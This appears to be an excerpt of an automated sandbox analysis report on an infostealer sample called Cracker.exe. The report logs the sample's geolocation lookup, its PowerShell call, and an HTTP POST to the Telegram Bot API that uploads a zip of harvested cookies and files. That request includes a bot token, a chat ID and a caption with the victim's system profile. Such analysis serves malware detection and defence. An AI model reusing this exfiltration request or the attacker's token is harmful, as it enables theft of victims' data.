                                                    Nov 8, 2024 11:44:09.547338963 CET1.1.1.1192.168.2.80x73b4No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • api.telegram.org
                                                    • ipwho.is

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849731108.181.61.49807528C:\Users\user\Desktop\Cracker.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 8, 2024 11:43:50.185416937 CET59OUTGET /?output=json HTTP/1.1
                                                    accept: */*
                                                    host: ipwho.is
                                                    Nov 8, 2024 11:43:51.342067957 CET955INHTTP/1.1 200 OK
                                                    Date: Fri, 08 Nov 2024 10:43:51 GMT
                                                    Content-Type: application/json; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Server: ipwhois
                                                    Access-Control-Allow-Headers: *
                                                    X-Robots-Tag: noindex
                                                    Data Raw: 32 63 62 0d 0a 7b 22 69 70 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 54 58 22 2c 22 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 32 2e 37 37 36 36 36 34 32 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 36 2e 37 39 36 39 38 37 39 2c 22 69 73 5f 65 75 22 3a 66 61 6c 73 65 2c 22 70 6f 73 74 61 6c 22 3a 22 37 35 32 30 31 22 2c 22 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 22 31 22 2c 22 63 61 70 69 74 61 6c 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 20 44 2e 43 2e 22 2c 22 62 6f 72 64 65 72 73 22 [TRUNCATED]
                                                    Data Ascii: 2cb{"ip":"173.254.250.90","success":true,"type":"IPv4","continent":"North America","continent_code":"NA","country":"United States","country_code":"US","region":"Texas","region_code":"TX","city":"Dallas","latitude":32.7766642,"longitude":-96.7969879,"is_eu":false,"postal":"75201","calling_code":"1","capital":"Washington D.C.","borders":"CA,MX","flag":{"img":"https:\/\/cdn.ipwhois.io\/flags\/us.svg","emoji":"\ud83c\uddfa\ud83c\uddf8","emoji_unicode":"U+1F1FA U+1F1F8"},"connection":{"asn":8100,"org":"Quadranet, INC","isp":"Quadranet Enterprises LLC","domain":"quadranet.com"},"timezone":{"id":"America\/Chicago","abbr":"CST","is_dst":false,"offset":-21600,"utc":"-06:00","current_time":"2024-11-08T04:43:51-06:00"}}0


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.849732149.154.167.2204437528C:\Users\user\Desktop\Cracker.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-08 10:44:10 UTC1184OUTPOST /bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-4128830475&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.90%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-06:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%203CYSMP%20(1280,%201024)%0AHWID:%207263582169614543%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cracker.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                                    content-type: multipart/form-data; boundary=0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961
                                                    content-length: 936023
                                                    accept: */*
                                                    host: api.telegram.org
                                                    2024-11-08 10:44:10 UTC15200OUTData Raw: 2d 2d 30 65 36 31 64 65 64 33 35 39 62 62 65 36 38 37 2d 32 65 61 31 34 37 66 64 37 61 32 62 64 33 66 39 2d 35 34 36 62 64 62 61 34 31 62 61 62 64 65 35 37 2d 64 61 38 34 30 65 36 32 31 65 32 64 61 39 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 5f 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 e3 5e 68 59 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 00 41 75 74 6f 66 69 6c 6c 2f 50 4b 03 04 14 00 00 00 00 00 e3 5e 68 59 00 00 00 00 00 00 00 00 00 00 00 00 08
                                                    Data Ascii: --0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961Content-Disposition: form-data; name="document"; filename="[US]_173.254.250.90.zip"Content-Type: application/zipPK^hYAutofill/PK^hY
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: 00 24 61 9b fb 05 02 40 12 f7 b3 8d 6d 00 6a ed c9 4c 22 02 49 8c e3 48 66 12 11 48 22 22 00 c8 4c 00 24 21 09 db 4c d3 44 55 00 60 9b cc c4 36 00 11 41 44 90 99 44 04 92 b8 9f 24 5a 6b b4 d6 00 90 44 44 25 02 a4 42 e6 44 26 d8 8d ae f4 b4 36 02 41 04 48 85 d6 46 a4 42 29 62 9a 26 00 24 01 60 9b fb 49 c2 36 92 b0 4d 6b 0d 80 52 0a 92 b0 4d 6b 8d 52 0a e3 38 22 89 c5 62 81 6d c6 71 24 22 90 84 6d 32 13 db 44 04 11 41 66 32 4d 13 35 02 49 00 48 02 c0 36 00 b6 b1 4d 44 50 6b 65 1c 47 00 ba ae 63 9a 26 32 93 50 45 12 11 01 40 6b 8d d6 1a 00 a5 14 6a ad 4c d3 84 6d 24 61 9b d6 1a 00 a5 14 24 71 3f 49 00 64 26 00 92 a8 b5 92 99 64 26 99 c9 fd 24 01 60 9b 88 40 12 b6 b1 0d 80 24 24 61 9b cc 24 24 22 82 cc 64 1c 47 24 d1 75 1d 99 89 24 5a 6b 44 04 b6 69 ad 51 6b
                                                    Data Ascii: $a@mjL"IHfH""L$!LDU`6ADD$ZkDD%BD&6AHFB)b&$`I6MkRMkR8"bmq$"m2DAf2M5IH6MDPkeGc&2PE@kjLm$a$q?Id&d&$`@$$a$$"dG$u$ZkDiQk
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: 00 d8 e6 81 6c 03 50 10 2f 8c cc 73 b0 cd 0b 63 9b e7 47 12 0f 64 1b 00 99 e7 61 1b 00 db d8 26 22 00 b0 8d 6d 24 01 60 9b 07 92 c4 73 93 cd 03 d9 e6 81 4a 29 d8 c6 36 00 b6 91 c4 fd 02 71 3f db 3c 37 49 d8 c6 36 b6 91 04 80 6d 00 94 46 12 92 90 04 80 6d 6c 63 1b 49 00 48 c2 36 00 b6 91 04 80 33 91 04 80 24 1e c8 36 32 97 d9 c6 36 92 88 08 6c d3 5a 43 12 f7 93 c4 0b 62 1b 00 49 dc cf 36 b6 89 08 00 a6 69 02 a0 d6 0a 40 66 52 10 92 00 c8 4c 6c 23 09 00 db 94 52 18 c7 91 88 a0 94 c2 34 4d 00 94 52 b0 8d 24 6c 63 1b 00 49 00 d8 06 a0 22 6c 63 1b 80 88 40 12 b6 b1 4d 66 62 1b 00 49 3c 50 44 00 60 9b cc 04 40 12 92 b8 9f 6d 24 21 09 49 d8 c6 36 b6 b1 4d 66 22 09 49 48 e2 b9 c9 01 80 24 6c 63 1b 00 49 48 c2 2d 91 84 24 6c 93 99 d8 c6 36 00 a5 14 5a 6b 48 a2 d6
                                                    Data Ascii: lP/scGda&"m$`sJ)6q?<7I6mFmlcIH63$626lZCbI6i@fRLl#R4MR$lcI"lc@MfbI<PD`@m$!I6Mf"IH$lcIH-$l6ZkH
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: 1b 00 49 44 04 11 81 24 a6 69 22 33 01 28 a5 20 09 db d8 e6 81 6c 23 09 49 d8 c6 36 b6 91 c4 fd 24 11 11 00 64 26 99 49 44 00 60 1b db 64 26 92 90 84 24 32 93 d6 1a 00 b5 56 22 82 cc 04 20 22 20 cd fd 6c 63 1b 00 db 00 94 52 68 ad 61 9b 88 a0 94 02 40 66 92 99 44 04 b6 b1 8d 24 1e c8 36 92 90 04 80 6d 32 13 db 48 22 22 88 08 32 13 00 49 00 d8 06 20 22 68 43 03 c0 36 b6 89 08 4a 29 00 b4 d6 a8 5d 50 4a a1 b5 c6 38 8e 48 42 12 b6 89 08 24 91 99 00 44 04 00 b6 01 90 84 1c dc cf 36 99 c9 fd 24 71 3f 49 48 22 33 b1 8d 24 22 02 c5 f7 af 6d 9b e7 47 12 c9 0b 27 89 fb d9 e6 7e 5f 7a fc af 79 a5 9d 81 c5 c6 26 11 c1 bf d6 30 8e 5c b8 78 89 fd c3 43 5e 98 81 c2 25 16 1c ba e3 db 56 8f e2 e9 6d 8b 07 b2 cd 0b 23 5e 34 b6 01 90 c4 fd 6c f3 2f 91 c4 0b f3 15 8f fa 73
                                                    Data Ascii: ID$i"3( l#I6$d&ID`d&$2V" " lcRha@fD$6m2H""2I "hC6J)]PJ8HB$D6$q?IH"3$"mG'~_zy&0\xC^%Vm#^4l/s
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: 92 5f fc fc 97 e0 4d fe e2 17 88 1f 5a a3 d3 0f 06 40 47 33 7e ee 73 6f e4 49 1f ff 55 7c dc 33 5e 82 9f fb b1 b7 e7 4d 78 b6 5f fa 81 9f e4 4d 7f f7 38 bf f8 2d af cb 9b f0 6c bf f4 ed df ca 9b fe d6 2e f0 18 7e f1 07 de 82 37 e1 d9 9e f2 fb 7f cd 23 7e fb 08 8e 2e f1 aa af f3 6a fc c1 1b ec f0 2c 7f fb 87 c4 0f 5d 82 cd 63 b0 71 1c 8e 76 79 95 57 7c 71 fe e0 0d 77 78 96 bf fd 43 e2 87 2e e1 a3 5d 3e f0 fd de 85 4f b8 e7 17 79 c4 2f 5c 82 8d 63 5c f6 98 97 c0 2f 7d 1b fa a1 4b 70 fa 41 70 ea 66 fe c3 9c bf 1d ce 8d fc e2 17 bd 34 6f f2 e7 3f 8b be ef 10 4e 3f 88 cb 8e 36 f8 c5 2f 7a 10 4f fa 98 2f e3 a3 6f 7d 29 7e f1 a7 de 89 37 e1 d9 7e e9 7b 7f 88 37 fd bd 33 fc e2 b7 bd 3e 6f c2 b3 fd d2 b7 7f 0b 6f f6 9b 97 30 8f e1 17 7f f0 2d 78 13 9e ed 29 bf f7
                                                    Data Ascii: _MZ@G3~soIU|3^Mx_M8-l.~7#~.j,]cqvyW|qwxC.]>Oy/\c\/}KpApf4o?N?6/zO/o})~7~{73>oo0-x)
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: db 00 44 04 00 b6 01 88 08 c6 71 44 12 11 41 44 20 09 db 64 26 99 49 44 c5 36 cf 8f 6d 24 01 20 89 e7 26 09 d2 d8 06 20 22 00 c8 4c 00 24 91 99 00 48 e2 81 6c 03 50 4a a1 b5 86 6d 22 02 49 d8 c6 36 00 11 01 40 6b 0d db 44 04 99 89 6d 6a ad 48 a2 b5 86 6d 24 21 89 07 2a 08 db d8 06 c0 36 00 92 28 a5 30 b5 01 49 00 d8 46 12 a5 14 6c 93 99 b4 d6 88 08 00 6c 13 11 d4 5a 01 98 a6 09 e9 fb 56 e6 f9 39 77 1b 9c 7b 06 9c 7d 06 97 6d 1e e3 59 ce 3e 03 8e 76 b9 6c e3 38 6c 1c 87 cd 63 b0 71 1c 8e 76 e1 f0 12 cf 61 f3 18 9c 7d 06 f6 83 79 f2 e7 ed f3 5e af f3 35 fc e1 83 5e 12 3d fa 35 e1 cc cd 70 74 09 0e 77 b9 6c f3 38 97 1d ee e2 c3 5d 9e c3 e6 71 00 d8 38 06 a7 1f 04 1b c7 d0 e6 09 38 da 85 73 cf 80 b3 cf c0 87 bb 3c cb e6 71 38 dc e5 59 8e 2e 21 71 c5 e9 07 f1
                                                    Data Ascii: DqDAD d&ID6m$ & "L$HlPJm"I6@kDmjHm$!*6(0IFllZV9w{}mY>vl8lcqva}y^5^=5ptwl8]q88s<q8Y.!q
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: cd bf 85 cc 0b 95 99 bc 30 c1 bf cc 36 f7 93 c4 fd 6c 23 89 07 b2 cd 03 c9 fc ab d9 26 cc f3 b0 cd bf 96 cc 65 b6 91 c4 03 d9 e6 3f 9a b8 c2 36 00 b6 79 a0 30 ff 2a 81 b0 cd f3 63 1b 94 d8 06 40 12 f7 b3 8d 6d 24 01 20 89 fb d9 e6 7e b6 79 a0 30 cf 14 00 d8 e6 81 64 ae 70 00 a0 30 2f 8c 6d ee 67 9b 17 c4 36 00 92 b8 2c 0d 80 6d 24 01 20 09 00 db 84 c1 36 0f 24 09 00 49 dc cf 36 b6 b1 cd 03 49 e2 32 37 00 24 f1 40 b6 b1 4d 29 05 db d8 c6 36 00 92 90 84 24 6c 93 99 00 48 02 c0 36 b6 01 28 a5 00 60 1b db 3c 90 24 d4 12 db 48 42 12 00 99 09 40 44 00 90 99 d8 46 12 11 01 40 66 92 99 94 52 78 20 db 3c 90 24 00 32 13 db 44 04 11 41 66 d2 5a 43 12 00 81 90 84 24 6c 93 99 d8 46 12 11 41 41 d8 26 33 b1 8d 24 24 21 89 cc c4 36 cf 2d 22 68 ad f1 dc 24 21 09 00 db d8
                                                    Data Ascii: 06l#&e?6y0*c@m$ ~y0dp0/mg6,m$ 6$I6I27$@M)6$lH6(`<$HB@DF@fRx <$2DAfZC$lFAA&3$$!6-"h$!
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: db 4c d3 44 d7 75 b4 d6 b0 4d 29 05 49 d8 e6 99 90 7e 70 65 00 db 3c 90 24 00 6c f3 22 b1 01 43 26 38 c1 c9 7f 84 30 97 d9 e6 81 24 01 60 9b e7 20 01 82 28 a0 00 89 ff eb 6c 73 3f 49 dc cf 36 92 f8 f7 b0 cd 0b 23 f3 bf 5c f0 c2 d8 e6 85 11 09 24 10 3c 5f 0e 9e 53 70 3f 0b 24 61 5e 08 9b 67 91 00 90 04 80 24 52 5c 26 19 49 04 57 d8 06 40 4e 6c 23 20 33 b1 8d 6d 20 01 50 0a 00 db 3c 90 24 00 dc 12 49 fc 7b d9 e6 81 24 01 60 9b 7f 8f e0 85 b3 cd 7f 26 99 17 ca 36 ff 9d 6c 03 20 f3 9f c2 36 ff 1e 61 fe 5d 6c f3 9f c9 36 57 04 cf 8f cc 0b 65 1b 80 22 61 9b 07 92 44 66 f2 df 2a cd bf 87 1c bc 30 b6 79 61 24 63 9b 07 b2 cd 8b 2a 1c 3c 37 db 3c 37 99 ff 10 b6 f9 8f 24 9b 7f 97 34 ff 2e 69 5e 18 49 00 d8 e6 f9 b1 b8 4c e6 f9 ca 4c 00 82 7f 1f 19 6c f3 dc 24 61 9b
                                                    Data Ascii: LDuM)I~pe<$l"C&80$` (ls?I6#\$<_Sp?$a^g$R\&IW@Nl# 3m P<$I{$`&6l 6a]l6We"aDf*0ya$c*<7<7$4.i^ILLl$a
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: 18 6c 03 20 09 db d8 06 20 22 c8 4c ee 67 9b e7 61 23 89 e7 66 9b e7 26 89 fb d9 06 20 0c 92 78 7e 24 31 4d 13 92 90 04 80 6d 1e 28 22 68 ad 11 11 64 26 32 94 52 98 a6 09 49 00 d8 06 40 12 21 71 3f db 3c 90 6d 32 13 00 49 48 a2 20 5a 6b 00 44 04 92 b0 8d 6d 24 51 4a 21 33 b1 4d 66 72 3f 49 3c 37 49 00 d8 e6 59 d2 3c 37 db dc 4f 32 b6 01 90 c4 fd 6c f3 40 b2 b1 8d 24 24 21 09 80 d6 1a 11 41 20 00 6c 63 1b 49 00 94 d2 d1 5a a3 b5 06 40 44 10 11 d8 26 33 01 90 c4 03 49 c2 36 99 09 40 44 20 09 db 00 48 22 33 99 a6 89 ae 54 9e 1f 49 48 c2 36 00 b6 b1 8d 6d 24 01 20 89 d6 1a 92 90 c4 fd 6c 63 1b 80 82 c8 4c 24 11 11 d8 a6 b5 06 40 44 60 9b 88 00 c0 36 00 92 90 04 40 6b 8d 88 00 60 9a 26 00 4a 29 48 c2 36 99 89 6d 24 11 11 48 22 33 01 88 08 32 13 db 08 90 44 44
                                                    Data Ascii: l "Lga#f& x~$1Mm("hd&2RI@!q?<m2IH ZkDm$QJ!3Mfr?I<7IY<7O2l@$$!A lcIZ@D&3I6@D H"3TIH6m$ lcL$@D`6@k`&J)H6m$H"32DD
                                                    2024-11-08 10:44:10 UTC16384OUTData Raw: ff 09 c2 bc 50 b6 78 61 22 02 00 a7 b0 cd fd 24 21 89 cc c4 02 19 2c 90 c1 02 19 2c 40 e2 7e 92 78 1e 61 00 24 21 09 49 44 04 81 00 18 86 01 db c8 c6 36 a4 b1 0d 00 36 b8 f1 3c 24 90 90 84 5b e3 85 91 c4 bf 87 0c b6 f9 37 73 f0 2f b1 0d 00 36 00 48 00 48 02 9b 17 85 6d 9e 9f 30 ff 2a b6 f9 d7 b0 cd 0b 23 f3 5f ca 36 0f 14 fc 3b a5 b9 9f 6d 00 6c 73 3f 49 bc 28 6c f3 fc 48 e2 3f 93 6d 9e 1f 99 17 49 98 67 b1 cd 7f 04 db 3c 37 f1 a2 b3 cd 8b 2a cc bf 4f 8a 17 95 6d fe 25 b6 f9 f7 90 79 be 6c 03 10 5c 21 09 80 66 03 10 3c 7f b6 01 90 f9 77 b3 cd 03 d9 a6 20 9e 1f db fc 6b d9 e6 5f 4b e6 85 b2 0d 80 78 fe 24 61 9b e7 66 9b 17 85 d2 3c 90 6d 00 64 2e 93 c4 fd 6c 73 bf e0 8a 46 e3 81 6c f3 40 92 00 08 f3 1c 6c 63 1b a9 00 20 89 fb d9 e6 7e 99 c9 f3 63 1b 80 4e
                                                    Data Ascii: Pxa"$!,,@~xa$!ID66<$[7s/6HHm0*#_6;mls?I(lH?mIg<7*Om%yl\!f<w k_Kx$af<md.lsFl@lc ~cN
                                                    2024-11-08 10:44:11 UTC389INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0
                                                    Date: Fri, 08 Nov 2024 10:44:11 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 1265
                                                    Connection: close
                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:05:43:14
                                                    Start date:08/11/2024
                                                    Path:C:\Users\user\Desktop\Cracker.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\Cracker.exe"
                                                    Imagebase:0x7ff67a9e0000
                                                    File size:2'269'184 bytes
                                                    MD5 hash:0F8507A31B1A48F31F26321C9762A513
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:05:43:50
                                                    Start date:08/11/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                    Imagebase:0x7ff6cb6b0000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:05:43:50
                                                    Start date:08/11/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6ee680000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    No disassembly